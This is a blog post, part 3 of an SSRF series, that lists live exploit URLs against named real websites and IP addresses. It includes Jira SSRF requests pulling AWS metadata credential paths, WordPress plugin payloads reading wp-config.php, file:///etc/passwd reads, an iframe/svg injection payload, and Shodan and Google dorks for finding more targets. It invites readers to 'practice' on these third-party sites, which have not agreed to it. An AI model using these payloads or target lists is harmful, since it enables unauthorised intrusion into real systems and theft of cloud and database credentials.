Open in app

Sign in

Write

Sign in

SSRF — Server Side Request Forgery (Types and ways to exploit it) Part-3

SaN ThosH
3 min readJan 27, 2019

--

Lets get in to Live Examples

The author of this BLOG is no way responsible for any misuse of the information.

4. Live Examples -

Lets look in to basic SSRF

https://robert-brook.com/parliament/index.php?page=http://www.parliament.uk/business/news/2019/parliamentary-news-2019/this-week-in-the-commons-friday-25-january-2019/

Here the page parameter fetch external resource and display its content

SSRF to XSS -

https://robert-brook.com/parliament/index.php?page=http://brutelogic.com.br/poc.svg

Read Local files -

https://robert-brook.com/parliament/index.php?page=file:///etc/passwd

When you try other URL schemas like DICT gives an error

 Warning: file_get_contents(): Unable to find the wrapper “dict” — did you forget to enable it when you configured PHP

This indicates DICT URL schemas is not enabled

In the same way you can try other URL schemas and find which all are enabled and use them to exploit it further

SSRF in FFMPEG -

Read local files

Working vulnerable site -

https://www.onlinevideoconverter.com/
https://www.files-conversion.com/

Repo Link - https://github.com/neex/ffmpeg-avi-m3u-xbin

SSRF in Widely used Plugins and CMS -

SSRF in Jira -

Jira version < 7.3.5 are suffering from SSRF

https://<JIRA_BASEPATH>/plugins/servlet/oauth/users/icon-uri?consumerUri=…

There are more than 40k jira sites on shodan. You can find them using below dorks

X-AUSERNAME: anonymous
X-AUSERNAME: anonymous org:"Amazon.com"  -- For aws
X-AUSERNAME: anonymous org:"Microsoft Azure" -- For Azure
X-AUSERNAME: anonymous org:"google"  -- For Google

Now lets see some vulnerable Sites

https://jira.majesco.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttps://jira.intellectdesign.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttps://team.asg.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttps://jira.magnitude.com/https://tickets.metabrainz.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttps://support.eu.evertz.com/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttps://jira.dhis2.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttps://jira.vectormediagroup.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/ -- Aws Details https://mattel.cprime.com/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttp://adoptivefam.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttps://jira.iea-dpc.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttps://jira.fellowshipchurch.com:8443/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttps://jira.soleus.nu/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttp://jira.succraft.com:8080/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttps://tickets.metabrainz.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttp://support.make-my-day.co.nz/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.comhttp://52.202.112.34/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/iam/security-credentials/SystemsManagerRole -- Aws Detailshttps://jira.canallabs.fr/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/profile -- Aws Detailshttp://54.247.191.19/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data -- Aws Detailshttp://52.22.123.239/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data -- Aws Detailshttp://52.22.123.239/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance -- Aws Detailshttps://devops.deviate.net.nz/projects/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance -- Aws Detailshttps://52.73.101.120/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/iam/security-credentials/BitbucketRole -- Aws Details

These are some vulnerable sites I found

SSRF in JSmol2WP Wordpress Plugin -

JSmol2WP version below 1.07 has an Unauthenticated Server Side Request Forgery

http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php

Dork -

inurl:wp-content/plugins/jsmol2wp

Vulnerable sites -

https://www.vivelab12.fr/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php -- DB detailshttp://thasso.com/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=https://google.com -- Fetch google.comhttp://www.ch.ic.ac.uk/rzepa/blog/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php -- DB details

SSRF in Qards Wordpress Plugin -

Qards is vulnerable to Server Side Request Forgery (SSRF)

http://target/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com

Dork -

inurl:wp-content/plugins/qards

Vulnerable sites -

http://www.horlovia-chemicals.ch/wordpress/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.comhttps://vfsgroup.com.au/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.comhttps://mrgoatygelato.com.au/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.comhttps://arturolopezvalerio.com/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.comhttps://hooverwellness.com/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com

SSRF in HTML to PDF conversion -

Vulnerable sites -

https://pdfcrowd.com/#convert_by_input
https://convertio.co/html-pdf/

Content of Ssrf.html

"><iframe src="file:///etc/passwd"></iframe>"><svg/onload=document.write(document.location)> -- to know the path and some times to know what os they are using at backend

All these sites posted above are just to let you practice , I am not responsible for any misuse of the information.

Ssrf
Jira
Xss Attack
Code
Remote Code Execution

--

--

SaN ThosH

Written by SaN ThosH

970 Followers

🥵

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams